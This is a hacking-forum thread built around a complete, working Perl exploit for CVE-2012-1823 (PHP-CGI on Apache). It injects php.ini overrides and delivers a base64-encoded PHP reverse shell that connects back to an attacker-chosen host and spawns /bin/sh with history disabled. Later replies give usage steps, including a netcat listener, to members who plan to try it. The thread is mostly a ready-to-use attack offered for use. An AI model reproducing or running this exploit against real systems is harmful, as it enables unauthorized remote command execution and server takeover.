Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


PHP + Apache remote code execution exploit

  • 0 Vote(s) - 0 Average


04-30-2014, 08:47 PM #1
BlackB0x3r Offline Junior Member **
Registered
Posts:3 Threads:3 Joined:Apr 2014 Reputation: 0
Mood: None
Code:
#!/usr/bin/perl
#
# Title: PHP + Apache remote code execution exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 29 October 2013
# Published: 3 November 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Exploit code description:
#
# Quick and dirty perl code to exploit CVE-2012-1823
# Based on Apache Magica by Kingcope. For the sake of fun
# and cross-platforms. Doesn't support SSL.
#
# Exploit usage:
#
# fire-up netcat to listen locally (nc -lvp port) for connect back shell
# or wget http://www.morxploit.com/morxtools/netcat.pl
# perl netcat.pl -l -p port
# perl morxphpache.pl target:port yourhost:port
# If successfully exploited then you should get a connect back shell from the
# target, otherwise you are fuarked =)

use strict;
use IO::Socket;

if(!defined($ARGV[0] && $ARGV[1])) {

system ('clear');
print "\n";
print "===================================================\n";
print "--- PHP + Apache remote code execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";

print "--- Usage: perl $0 target:port local:port\n";
print "--- Ex: perl $0 192.168.1.115:80 192.168.1.102:1337\n\n";
exit; }

my $target = $ARGV[0];
my ($host, $port)= split(':',$target);

my $reverse = $ARGV[1];
my ($connectback, $connectbackport)= split(':',$reverse);

##### Change as needed #####
my $path = "/cgi-bin/php";
##################################

system ('clear');
print "\n";
print "===================================================\n";
print "--- PHP + Apache remote code execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";


print "[*] Trying to MorXploit $target\n";

my $xploit = "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E";
my $post = "POST $path?$xploit HTTP/1.1";
my $agent = "User-Agent: MorXploit";
my $accept = "Accept: */*";
my $hostname = "Host: $host";
my $connection = "Connection: Close";
my $ct = "Content-Type: application/x-www-form-urlencoded";

my $phpshell = "set_time_limit(0);
\$ip = \"$connectback\";
\$port = \"$connectbackport\";
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;
if (function_exists('pcntl_fork')) {
    \$pid = pcntl_fork();    
    if (\$pid == -1) {
        printit(\"ERROR: Can't fork\");
        exit(1);
    }
    if (\$pid) {
        exit(0);
    }
    if (posix_setsid() == -1) {
        printit(\"Error: Can't setsid()\");
        exit(1);
    }
    \$daemon = 1;
} else {
    printit(\"WARNING: Failed to daemonise.\");
}
chdir(\"/\");
umask(0);
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
    printit(\"\$errstr (\$errno)\");
    exit(1);
}
\$descriptorspec = array(
   0 => array(\"pipe\", \"r\"),
   1 => array(\"pipe\", \"w\"),
   2 => array(\"pipe\", \"w\")
);
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
    printit(\"ERROR: Can't spawn shell\");
    exit(1);
}
stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);
while (1) {
    if (feof(\$sock)) {
        printit(\"ERROR: Shell connection terminated\");
        break;
    }
    if (feof(\$pipes[1])) {
        printit(\"ERROR: Shell process terminated\");
        break;
    }
    \$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
    \$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
    if (in_array(\$sock, \$read_a)) {
        if (\$debug) printit(\"SOCK READ\");
        \$input = fread(\$sock, \$chunk_size);
        if (\$debug) printit(\"SOCK: \$input\");
        fwrite(\$pipes[0], \$input);
    }
    if (in_array(\$pipes[1], \$read_a)) {
        if (\$debug) printit(\"STDOUT READ\");
        \$input = fread(\$pipes[1], \$chunk_size);
        if (\$debug) printit(\"STDOUT: \$input\");
        fwrite(\$sock, \$input);
    }
    if (in_array(\$pipes[2], \$read_a)) {
        if (\$debug) printit(\"STDERR READ\");
        \$input = fread(\$pipes[2], \$chunk_size);
        if (\$debug) printit(\"STDERR: \$input\");
        fwrite(\$sock, \$input);
    }
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);
function printit (\$string) {
    if (!\$daemon) {
        print \"\$string
\";
    }
}
exit(1);";

my $enc = EncodeBase64($phpshell);
my $evalenc = "<?php eval(base64_decode('$enc')); ?>";

my $cl = length($evalenc);
my $content = "Content-Length: $cl";

sub EncodeBase64
{
    my $s = shift ;
    my $r = '';
    while( $s =~ /(.{1,45})/gs ){
        chop( $r .= substr(pack("u",$1),1) );
    }
    my $pad=(3-length($s)%3)%3;
    $r =~ tr|` -_|AA-Za-z0-9+/|;
    $r=~s/.{$pad}$/"="x$pad/e if $pad;
    $r=~s/(.{1,72})/$1\n/g;
    $r;
}

my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "$port",Proto => "tcp"); die "[-] Can't creat socket: $!\n" unless $sock;

print $sock "$post\n";
print $sock "$agent\n";
print $sock "$accept\n";
print $sock "$hostname\n";
print $sock "$connection\n";
print $sock "$ct\n";
print $sock "$content\n\n";
print $sock "$evalenc\n";

print "[*] Exploit sent! Check netcat.\n";
$sock->close();
exit;

05-01-2014, 01:33 AM #2
exploit Offline Junior Member **
Registered
Posts:13 Threads:4 Joined:Sep 2013 Reputation: 1
Mood: Alone
how to use

08-18-2014, 06:08 AM #3
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
to using that you just need to call it over the console and listen over netcat Smiley1
perl morxphpache.pl yourtarget:port netcatip:port
so easy Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]

08-23-2014, 01:29 PM #4
PhpFreak Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Aug 2014 Reputation: 0
Mood: Hacker
Nice! going to chk this.. Biggrinsmiley Thanks.






Forum Jump:


Users browsing this thread:1 Guest(s)